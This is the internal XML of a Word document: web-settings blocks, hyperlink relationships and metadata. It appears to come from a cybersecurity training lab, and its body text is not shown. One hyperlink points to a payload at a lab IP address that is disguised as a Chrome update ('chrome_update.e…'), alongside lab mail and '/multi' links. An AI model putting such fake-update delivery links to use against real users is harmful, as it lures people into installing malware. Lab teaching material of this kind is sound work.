        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565290438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1645311461">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1655986748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1667316412">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1814713138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1849327333">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1911769533">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1930655687">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1960603974">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1964994371">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2005277599">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2045403283">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2062318003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="21434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10.10.10.10" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.johnbryce.co.il" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:joe@10.10.10.10" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10:1212/chrome_update.e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10.10.10.10/multi"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CFF0-FA6E-4519-BE82-00ECC628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3</Pages>
  <Words>6409</Words>
  <Characters>36536</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>304</Lines>
  <Paragraphs>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C זסב</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>SXC זסב</cp:lastModifiedBy>
  <cp:revision>110</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-06T11:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-18T10:16:00Z</dcterms:modified>
</cp:coreProperties>
</file>